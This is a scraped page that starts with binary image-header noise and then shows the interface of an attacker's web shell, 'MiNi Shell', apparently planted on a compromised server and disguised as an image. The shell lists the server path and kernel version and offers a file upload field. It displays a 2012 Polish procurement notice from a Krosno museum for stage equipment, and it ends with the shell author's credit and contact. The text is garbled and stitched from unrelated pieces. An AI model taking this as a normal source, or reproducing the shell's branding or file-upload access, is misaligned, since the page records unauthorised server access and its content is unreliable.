JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/278494-N-2012.html

<p class="kh_header"><b>Krosno: Zakup nowoczesnego wyposażenia dla Muzeum Podkarpackiego w Krośnie</b><br>
<b>Numer ogłoszenia: 278494 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podkarpackie w Krośnie , ul. Piłsudskiego 16, 38-400 Krosno, woj. podkarpackie, tel. 013 4321376, faks 013 4324301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.muzeum.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup nowoczesnego wyposażenia dla Muzeum Podkarpackiego w Krośnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie zakłada dostawę  fabrycznie nowego sprzętu niezbędnego do prowadzenia działalności kulturalnej, badawczej i edukacyjnej. Dostawa wyposażenia obejmuje : 
Zadanie Nr 2 - Zakup sceny w ramach zadania inwestycyjnego pn. Zakup nowoczesnego wyposażenia dla Muzeum Podkarpackiego w Krośnie 
Scena, 1 zestaw Zestaw zawiera: 8 podestów scenicznych, 3 podesty systemowe schodów, 24 nogi do sceny, 14 nóg do schodów, 6 nóg stopniowych (wszystkie nogi wyposażone w : adaptery gwintowane, pierścienie obciążeniowe, wrzeciona regulacyjne z nakrętką kontrującą oraz ochraniacze podłogowe),  8 łączników do konstrukcji trybunowych, 8 łączników specjalne N-F do łączenia schodów ze sceną, 6 trzpieni mocujących, parawan tekstylny, taśma rzepowa, wózek transportowy - do składowania i transportu 6 podestów pionowo i na boku, wózek do składowania i transportu nóg i akcesoriów, hak pomocniczy do demontażu, obejma uziemiająca scenę z przewodem 10 m
Podstawowym elementem sceny jest podest systemowy. Składa się on z ramy aluminiowej, wykonanej ze specjalnie ukształtowanych profili z wpustem i piórem, z wbudowanym mechanizmem blokującym oraz antypoślizgowej, wodoodpornej płyty ze sklejki. Wszystkie profile ramy muszą posiadać wpust i pióro zapewniające proste łączenie podestów oraz wielofunkcyjne otwory podestu umożliwiające przytwierdzenie w prosty sposób elementów mocujących schodów. Wszystkie elementy sceny: podesty, schody - muszą być montowane bez użycia narzędzi poprzez przełożenie dźwigni zaciskowej. 
Wszystkie nogi muszą być wyposażone w adapter gwintowy do zamocowania elementów mocujących barierki i schody oraz w pierścień obciążeniowy zwiększający żywotność podestów przy długotrwałej eksploatacji. Ponadto nogi z wrzecionem regulacyjnym muszą posiadać stabilizującą nakrętkę kontrującą oraz ochraniacze podłogowe z antypoślizgowej twardej gumy.
Z dodatkowych elementów seryjnych o tych samych parametrach (wymiary, grubość powierzchni) - podestów scenicznych schodów, dostawia się schody, montowane na wymiennych nogach niwelacyjnych z wrzecionem regulacyjnym. 
Scena zamawiana powinna mieć rozmiary: 3 x 4 m, powinna składać się z 6 podestów systemowych o wymiarach: 200 x 100 cm. Do jej montażu potrzebnych jest 12 nóg wtykanych z adapterami gwintowymi oraz ochraniaczami podłogowymi. Dodatkowo montowane będą schody z trzech elementów systemowych o wymiarach: 200 x 39 cm, dołączane do całości bez użycia narzędzi, przy zastosowaniu nóg niwelacyjnych z wrzecionem regulacyjnym oraz nóg stopniowych.
Żadne elementy systemu scenicznego nie mogą wymagać konserwacji lub użycia narzędzi do montażu.
Parametry techniczne: 
Podest systemowy
Rama aluminiowa 
Sklejka antypoślizgowa, ciemnobrązowa 
Grubość - 12 mm 
Wysokość składowania - 9 cm 
Nośność - 750 kg łamane przez m kwadratowy
Wymiar  - 200 x 100 cm
Ilość - podest systemowy sceny - 6 sztuk + 2 sztuki dodatkowo
Wymiar podestu systemowego schodów - 200 x 39 cm górny stopień schodów
Ilość - podest systemowy schodów - 3 sztuki
Nogi
Nogi z wrzecionem regulacyjnym i podstawą talerzową, skok wrzeciona 6 cm, z nakrętką kontrującą
Średnica - 48,3 mm
Grubość ścianki - 4 mm
Materiał - do wys. 80 cm aluminium
Wysokość  - 60 cm
Ilość - 24 sztuki (do konstrukcji zaczepowej sceny 12; połowa nie będzie używana w pierwotnym montażu i stanowić będzie zabezpieczenie w eksploatacji)
Nogi wymienne niwelacyjne z wrzecionem regulacyjnym do schodów
z wrzecionem regulacyjnym i podstawą talerzową, skok wrzeciona 6 cm 
Wysokość - 60 cm - ilość - 4 sztuki
Wysokość - 40 cm - ilość - 4 sztuki
Wysokość - 20 cm - ilość - 6 sztuk
Ilość razem - 14 sztuk
Akcesoria do montażu:
łączniki do konstrukcji trybunowych, stal ocynkowana, długość: 110 mm - 8 sztuk
łączniki specjalne N-F do łączenia schodów ze sceną - 8 sztuk
Nogi stopniowe (do łączenia stopnia ze stopniem)
Wysokość - 20 cm
Średnica - 48,3 mm
Ilość - 6 sztuk
Akcesoria do montażu:
trzpień mocujący o średnicy 39 mm do nóg stopniowych o średnicy 48,3 mm, stal ocynkowana, 6 sztuk
Wyposażenie standardowe nóg:
Wszystkie nogi są wyposażone w adapter gwintowany (do zamocowania elementów mocujących barierki i schody) oraz w pierścień obciążeniowy (zwiększający żywotność podestów przy długotrwałej eksploatacji). Nogi wyposażone są ponadto we wrzeciono regulacyjne z nakrętką kontrującą (do stabilizacji konstrukcji nośnej) do scen o wysokości od 60 cm. Ponadto każda noga zabezpieczona jest w ochraniacz podłogowy z twardej gumy antypoślizgowej, 
Ochraniacze podłogowe do nóg:
Nogi z wrzecionem regulacyjnym i podstawą talerzową - 24 sztuki
Nogi wymienne niwelacyjne z wrzecionem regulacyjnym do schodów - 14 sztuk
Akcesoria dodatkowe do systemu scenicznego: 
Parawan tekstylny 
Materiał - satyna typu Dimout
Masa: ok. 260-280 g/m2, trwale trudno zapalny zgodnie z normą DIN 4102 B1
Gotowy do montażu, gładko wykończony, u góry przyszyta taśma z flauszu
Kolor: czarny
Do scen o wys. 60 cm
Długość - 4 m
Taśma rzepowa - kolor czarny, szerokość 20 mm, długość 4 m
Wózek transportowy - do składowania i transportu 6 podestów pionowo i na boku
Rama z ocynkowanej stali 
Podłoga: płyta sklejkowa, 4 rolki skrętne o średnicy 12,5 cm z blokadą, z 1 pasem z pętlą z zamkiem zapadkowym (wymiary pasa: szerokość - 2,5 cm, długość - 4 m, uciąg - 1,6 t) Wymiary wózka: długość - 216 cm, szerokość -59 cm, wysokość - 120 cm
Wózek do składowania i transportu nóg i akcesoriów
Rama z ocynkowanej stali
4 rolki skrętne o średnicy 12,5 cm z blokadą, z 1 pasem z pętlą z zamkiem zapadkowym ( wymiary pasa: szerokość - 2,5 cm, długość - 4 m, uciąg - 1,6 t)
Wymiary wózka: długość - 64 cm, szerokość - 48 cm, wysokość - 75 cm
Hak pomocniczy do demontażu
Obejma uziemiająca scenę z przewodem 10 m
Wraz z dostawą Zamawiający wymaga:
dostarczenie fabrycznie nowego wyposażenia na koszt Wykonawcy do siedziby Muzeum Podkarpackiego w Krośnie - ul. Piłsudskiego 16 , 38-400 Krosno
rozładunek wyposażenia do wskazanych przez Zamawiającego pomieszczeń,
montażu i uruchomienia wyposażenia
przeszkolenia wskazanych pracowników Zamawiającego min. 4 osoby ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.20-0, 44.40.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena   spełniania   tego   warunku   odbędziesię na podstawie oświadczenia - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca    musi    wykazać    się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednej dostawy obejmującej dostawę sceny z podestów systemowych o powierzchni antypoślizgowej na łączną kwotę 20 000,00 zł. ocena  spełniania tego  warunku odbędzie  się  na podstawie  oświadczenia załącznik nr 4 do SIWZ oraz wykazu zrealizowanych dostaw - załącznik nr 5 do SIWZ  (wraz z dokumentami potwierdzającymi, że dostawy zostały wykonane lub są wykonywane należycie) oraz zobowiązania innych podmiotów - załącznik nr 6 (jeżeli dotyczy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena   spełniania   tego   warunku   odbędziesię na podstawie oświadczenia - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena   spełniania   tego   warunku   odbędziesię na podstawie oświadczenia - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena   spełniania   tego   warunku   odbędziesię na podstawie oświadczenia - załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo
do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Upoważnienie do podpisania oferty, o ile nie wynika ono z dokumentów dołączonych do oferty,
Zobowiązanie innych podmiotów - załącznik nr 6 (jeżeli dotyczy),</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić, po ewentualnej zmianie przepisu dotyczącego
wysokości stawki podatku od towarów i usług VAT, co skutkować będzie
zmianą   kwoty   netto    i    naliczonych   kwot   podatku    VAT,    do    dostaw
wykonywanych  po  dniu w którym przepisy zaczną obowiązywać. 
Cena ryczałtowa pozostanie bez zmian.
Zmiana  umowy może  nastąpić w okoliczności  zaistnienia,  po  zawarciu
umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku
rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podkarpackie w Krośnie 
ul. Piłsudskiego 16
38-400 Krosno sekretariat, p.11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Muzeum Podkarpackie w Krośnie 
ul. Piłsudskiego 16
38-400 Krosno sekretariat, p.11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowano ze środków MKiDN
w ramach programu MKiDN - zakup wyposażenia na potrzeby działalności kulturalnej, w tym zakup instrumentów muzycznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com